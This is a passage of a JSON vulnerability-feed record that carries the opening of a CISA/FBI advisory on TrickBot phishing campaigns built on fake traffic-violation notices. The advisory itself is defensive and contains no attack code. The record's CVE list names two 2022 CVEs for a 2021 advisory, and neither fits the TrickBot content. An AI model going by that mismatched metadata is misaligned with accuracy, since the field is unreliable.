"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-04-15T12:00:00", "id": "AA21-077A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-077a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:17:32", "description": "### Summary\n\n_This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 8. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.\n\nTrickBot\u2014first identified in 2016\u2014is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.\n\nTo secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which\u2014if enabled\u2014execute malware (_Phishing:_ _Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>)]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. 
(_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>)], _User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>)]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically